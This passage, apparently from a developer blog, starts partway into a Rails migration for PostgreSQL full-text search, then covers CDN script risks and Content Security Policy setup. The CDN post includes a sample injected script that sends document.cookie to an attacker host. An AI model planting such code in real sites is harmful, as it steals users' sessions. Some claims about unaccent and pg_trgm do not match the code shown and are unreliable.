  def up
    # Enable necessary extensions
    enable_extension 'pg_trgm' unless extension_enabled?('pg_trgm')
    enable_extension 'unaccent' unless extension_enabled?('unaccent')

    # Add a generated column for combined search
    add_column :products, :searchable, :tsvector
    execute <<-SQL
      UPDATE products 
      SET searchable = 
        setweight(to_tsvector('english', coalesce(name, '')), 'A') ||
        setweight(to_tsvector('english', coalesce(description, '')), 'B');
    SQL

    # Create a function to automatically update the searchable column
    execute <<-SQL
      CREATE OR REPLACE FUNCTION products_search_trigger() RETURNS trigger AS $$
      begin
        new.searchable :=
          setweight(to_tsvector('english', coalesce(new.name, '')), 'A') ||
          setweight(to_tsvector('english', coalesce(new.description, '')), 'B');
        return new;
      end
      $$ LANGUAGE plpgsql;
    SQL

    # Create a trigger to update the searchable column
    execute <<-SQL
      CREATE TRIGGER tsvector_update_products BEFORE INSERT OR UPDATE
      ON products FOR EACH ROW EXECUTE FUNCTION products_search_trigger();
    SQL

    # Create a GIN index for the searchable column
    add_index :products, :searchable, using: :gin, name: 'index_products_on_searchable'
  end

  def down
    remove_index :products, name: 'index_products_on_searchable'
    execute 'DROP TRIGGER IF EXISTS tsvector_update_products ON products'
    execute 'DROP FUNCTION IF EXISTS products_search_trigger()'
    remove_column :products, :searchable
  end
end

2. In our Product model, add the search method:

# app/models/product.rb
class Product < ApplicationRecord
  # ... existing code ...

  def self.search_in_name_and_desc(query)
    return all if query.blank?

    # The tsvector_update_products trigger created in the migration keeps the
    # searchable column in sync, so the query only needs to read it.
    ts_query = sanitize_sql_array(["plainto_tsquery('english', ?)", query])

    where("searchable @@ #{ts_query}")
      .order(Arel.sql("ts_rank(searchable, #{ts_query}) DESC"))
  end
end

3. Usage:

# Basic search (searches both name and description)
results = Product.search_in_name_and_desc("laptop")

# You can chain other scopes
results = Product.in_stock.search_in_name_and_desc("gaming laptop").order(price: :asc)

How It Works:

  1. Weighted Search:
    • Name matches (‘A’ weight) are ranked higher than description matches (‘B’ weight)
    • Full-text search handles word stemming and stop words automatically
  2. Performance:
    • The GIN index on the searchable tsvector column makes searches fast
    • The trigger keeps the searchable column in sync automatically
  3. Features:
    • Handles partial matches
    • Ranks results by relevance
    • Case-insensitive
    • Handles common words and stop words

Test the search:

# Test with different search terms
Product.search_in_name_and_desc("gaming laptop")  # Matches records containing both terms in name or description

# Note: plainto_tsquery treats every word as a required term and ignores
# operators. To support exclusion ("gaming -mouse") or OR ("gaming OR laptop"),
# swap plainto_tsquery for websearch_to_tsquery (PostgreSQL 11+).

This implementation gives you a single, efficient search method that handles both name and description fields with proper ranking and performance characteristics.


What unaccent Does:

The unaccent extension in PostgreSQL is a text search dictionary that removes accents (diacritic signs) from lexemes, making searches accent-insensitive. Here’s why it’s useful:

  1. Normalizes Text: Converts accented characters to their unaccented equivalents
    • Example: café → cafe, Héllo → Hello
  2. Improves Search:
    • Without it: Searching for “cafe” won’t match “café”
    • With it: Both “cafe” and “café” will match
  3. Common Use Cases:
    • User search functionality where you want to ignore accents
    • International product catalogs
    • User names or locations with special characters

Example in Our Code:

In your search migration, it ensures that:

  • A search for “resume” will also match “résumé”
  • A search for “cafe” will match “café”
  • “Jalapeño” matches “jalapeno”
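
You can verify this quickly from a Rails console, assuming the unaccent extension is enabled (the ILIKE query is only an illustration of accent-insensitive matching, not part of the migration above):

# Strip diacritics directly in PostgreSQL
ActiveRecord::Base.connection.select_value("SELECT unaccent('Jalapeño café')")
# => "Jalapeno cafe"

# Accent-insensitive matching by unaccenting both sides of the comparison
Product.where("unaccent(name) ILIKE unaccent(?)", "%cafe%")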

How It Works with Your Search:

When combined with pg_trgm, it makes your search more user-friendly by:

  1. Removing accents from both the search term and the stored text
  2. Then performing the similarity comparison

Disabling/Enabling:

  • The extension is enabled only if it’s not already enabled (unless extension_enabled?('unaccent'))
  • It’s safe to keep enabled as it doesn’t affect existing data unless explicitly used

What pg_trgm Does:

The pg_trgm (PostgreSQL Trigram) extension is specifically designed for fuzzy string matching and searching. Here’s what it does:

Key Features of pg_trgm:

  1. Trigram Matching:
    • Breaks strings into groups of 3 consecutive characters
    • Example: “hello” → [“  h”, “ he”, “hel”, “ell”, “llo”, “lo ”]
    • Uses these trigrams to find similar strings
  2. Fuzzy Search Capabilities:
    • Finds matches even with typos or slight misspellings
    • Ranks results by similarity
    • Works well for “did you mean?” type suggestions
  3. Common Operators:
    • % – Similarity operator (returns true if strings are similar)
    • <-> – Distance operator (returns a distance metric)
    • %> – Word similarity (best match of any word in the search)

In Our Implementation:

# This uses pg_trgm's similarity matching
where("name % ?", search_term)
  .order(Arel.sql(sanitize_sql_array(["similarity(name, ?) DESC", search_term])))

Example Searches:

# Finds "Samsung" even if spelled "Samsng" or "Samsing"
Product.where("name % ?", "Samsng")

# Ranks "iPhone 13" higher than "iPhone 12" when searching for "iPhone 13 Pro"
Product.where("name % ?", "iPhone 13 Pro").order("name <-> 'iPhone 13 Pro'")

Benefits in Our Case:

  1. Typo Tolerance: Users can make small mistakes and still find products
  2. Partial Matches: Finds “phone” in “smartphone”
  3. Ranked Results: More relevant matches appear first

The combination of pg_trgm with unaccent (which handles accents) gives you robust, user-friendly search capabilities right in the database.

Final model and migration

Product Model:

class Product < ApplicationRecord
  has_many :order_items, dependent: :destroy
  has_many :orders, through: :order_items

  validates :name, presence: true
  validates :price, presence: true, numericality: { greater_than: 0 }
  validates :stock, presence: true, numericality: { greater_than_or_equal_to: 0 }

  # Search across both name and description
  # @param query [String] search term
  # @return [ActiveRecord::Relation] matching products ordered by relevance
  def self.search_in_name_and_desc(query)
    return all if query.blank?

    # The tsvector_update_products trigger created in the migration keeps the
    # searchable column in sync, so the query only needs to read it.
    ts_query = sanitize_sql_array(["plainto_tsquery('english', ?)", query])

    where("searchable @@ #{ts_query}")
      .order(Arel.sql("ts_rank(searchable, #{ts_query}) DESC"))
  end
end

Product Migration:

class AddSearchableToProducts < ActiveRecord::Migration[8.0]
  def up
    # Enable necessary extensions
    enable_extension 'pg_trgm' unless extension_enabled?('pg_trgm')
    enable_extension 'unaccent' unless extension_enabled?('unaccent')

    # Add searchable column
    add_column :products, :searchable, :tsvector

    # Create a function to update the searchable column
    execute <<-SQL
      CREATE OR REPLACE FUNCTION products_search_trigger() RETURNS trigger AS $$
      begin
        new.searchable :=
          setweight(to_tsvector('english', coalesce(new.name, '')), 'A') ||
          setweight(to_tsvector('english', coalesce(new.description, '')), 'B');
        return new;
      end
      $$ LANGUAGE plpgsql;
    SQL

    # Create a trigger to update the searchable column
    execute <<-SQL
      CREATE TRIGGER tsvector_update_products
      BEFORE INSERT OR UPDATE ON products
      FOR EACH ROW EXECUTE FUNCTION products_search_trigger();
    SQL

    # Update existing records (the UPDATE fires the trigger, populating searchable)
    Product.find_each(&:touch)

    # Create GIN index for the searchable column
    add_index :products, :searchable, using: :gin, name: 'gin_idx_products_on_searchable'
  end

  def down
    remove_index :products, name: 'gin_idx_products_on_searchable'
    execute 'DROP TRIGGER IF EXISTS tsvector_update_products ON products'
    execute 'DROP FUNCTION IF EXISTS products_search_trigger()'
    remove_column :products, :searchable
  end
end


Happy Coding!

🌐 Why CORS Doesn’t Protect You from Malicious CDNs (and How to Stay Safe) | Content Security Policy (CSP)

🔍 Introduction

Developers often assume CORS (Cross-Origin Resource Sharing) protects their websites from all cross-origin risks. However, while CORS effectively controls data access via APIs, it does NOT stop risks from external scripts like those served via a CDN (Content Delivery Network).

This blog explains:

  • Why CORS and CDN behave differently
  • Why external scripts can compromise your site
  • Best practices to secure your app

🤔 What Does CORS Actually Do?

CORS is a browser-enforced security mechanism that prevents JavaScript from reading responses from another origin unless explicitly allowed.

Example:

// Your site: https://example.com
fetch('https://api.example2.com/data') // blocked unless API sets CORS headers

If api.example2.com does not send:

Access-Control-Allow-Origin: https://example.com

The browser blocks the response.

Why?

To prevent cross-site data theft.


🧐 Why CDN Scripts Load Without CORS?

When you include a script via <script> or CSS via <link>:

<script src="https://cdn.com/lib.js"></script>
<link rel="stylesheet" href="https://cdn.com/styles.css" />

These resources are fetched and executed without CORS checks because:

  • They are treated as subresources, not API data.
  • The browser doesn’t expose raw content to JavaScript; it just executes it.

⚠️ But Here’s the Risk:

The included script runs with full privileges in your page context!

  • Can modify DOM
  • Access non-HttpOnly cookies
  • Exfiltrate data to a malicious server

💯 Real-World Attack Scenarios

  1. Compromised CDN:
    If https://cdn.com/lib.js is hacked, every site using it is compromised.
  2. Man-in-the-Middle Attack:
    If CDN uses HTTP instead of HTTPS, an attacker can inject malicious code.

Example Attack:

// Injected malicious script in compromised CDN
fetch('https://attacker.com/steal', {
  method: 'POST',
  body: JSON.stringify({ cookies: document.cookie })
});


🧐 Why CORS Doesn’t Help Here

  • CORS only applies to fetch/XHR made by your JavaScript.
  • A <script> tag is not subject to CORS; the browser assumes you trust that script.

❓How to Secure Your Site

1. Always Use HTTPS

Avoid HTTP CDN URLs. Example:
✅ https://cdn.jsdelivr.net/...
❌ http://cdn.jsdelivr.net/...

2. Use Subresource Integrity (SRI)

Ensure the script hasn’t been tampered with:

<script src="https://cdn.com/lib.js"
        integrity="sha384-abc123xyz"
        crossorigin="anonymous"></script>

If the hash doesn’t match, the browser blocks it.
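
To generate the integrity value yourself, a small Ruby sketch works (assuming you have downloaded a local copy of lib.js to hash):

require "digest"
require "base64"

# Compute the SRI value for the integrity attribute
digest = Digest::SHA384.digest(File.read("lib.js"))
puts "sha384-#{Base64.strict_encode64(digest)}"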

3. Self-Host Critical Scripts

Host important libraries locally instead of depending on external CDNs.

4. Set Content Security Policy (CSP)

Restrict allowed script sources:

Content-Security-Policy: script-src 'self' https://cdn.com;


Diagram: Why CORS ≠ CDN Protection

Conclusion

  • CORS protects API calls, not scripts.
  • External scripts are powerful and dangerous if compromised.
  • Use HTTPS, SRI, CSP, and self-hosting for maximum safety.

🔐 Content Security Policy (CSP) – The Complete Guide for Web Security

🔍 Introduction

Even if you secure your API with CORS and validate CDN scripts with SRI, there’s still a risk of inline scripts, XSS (Cross-Site Scripting), and malicious script injections. That’s where Content Security Policy (CSP) comes in.

CSP is a powerful HTTP header that tells the browser which resources are allowed to load and execute.

🧐 Why CSP?

  • Blocks inline scripts and unauthorized external resources.
  • Reduces XSS attacks by whitelisting script origins.
  • Adds an extra layer beyond CORS and HTTPS.

How CSP Works

The server sends a Content-Security-Policy header, defining allowed resource sources.

Example:

Content-Security-Policy: script-src 'self' https://cdn.example.com;

This means:

  • Only load scripts from current origin (self) and cdn.example.com.
  • Block everything else.

Common CSP Directives

Directive    | Purpose
default-src  | Default policy for all resources
script-src   | Allowed sources for JavaScript
style-src    | Allowed CSS sources
img-src      | Allowed image sources
font-src     | Allowed font sources
connect-src  | Allowed AJAX/WebSocket endpoints

Example 1: Strict CSP for Rails App

In Rails, set CSP in config/initializers/content_security_policy.rb:

Rails.application.config.content_security_policy do |policy|
  policy.default_src :self
  policy.script_src :self, 'https://cdn.jsdelivr.net'
  policy.style_src  :self, 'https://cdn.jsdelivr.net'
  policy.img_src    :self, :data
  policy.connect_src :self, 'https://api.example.com'
end

Enforce the policy (rather than running in report-only mode):

Rails.application.config.content_security_policy_report_only = false

Example 2: CSP in React + Vite App

If deploying via Nginx, add in nginx.conf:

add_header Content-Security-Policy "default-src 'self'; script-src 'self' https://cdn.jsdelivr.net; style-src 'self' https://cdn.jsdelivr.net; connect-src 'self' https://api.example.com";

For Netlify or Vercel, add in _headers file:

/*
  Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.jsdelivr.net; style-src 'self' https://cdn.jsdelivr.net; connect-src 'self' https://api.example.com


✋ Prevent Inline Script Issues

By default, CSP blocks inline scripts. To allow, you can:

  • Use hash-based CSP:
Content-Security-Policy: script-src 'self' 'sha256-AbCdEf...';

  • Or nonce-based CSP (preferred for dynamic scripts):
Content-Security-Policy: script-src 'self' 'nonce-abc123';

Add nonce dynamically in Rails views:

<script nonce="<%= content_security_policy_nonce %>">alert('Safe');</script>

CSP Reporting

Enable Report-Only mode first:

Content-Security-Policy-Report-Only: script-src 'self'; report-uri /csp-violation-report

This logs violations without blocking, so you can test before enforcement.
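
In Rails, the same report-only rollout can be expressed in the CSP initializer (the /csp-violation-report path is an example endpoint you would implement yourself):

# config/initializers/content_security_policy.rb
Rails.application.config.content_security_policy do |policy|
  policy.script_src :self
  policy.report_uri "/csp-violation-report"
end

# Report violations without enforcing the policy yet
Rails.application.config.content_security_policy_report_only = true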

Conclusion

CSP + HTTPS + SRI = Strong Defense Against XSS and Injection Attacks.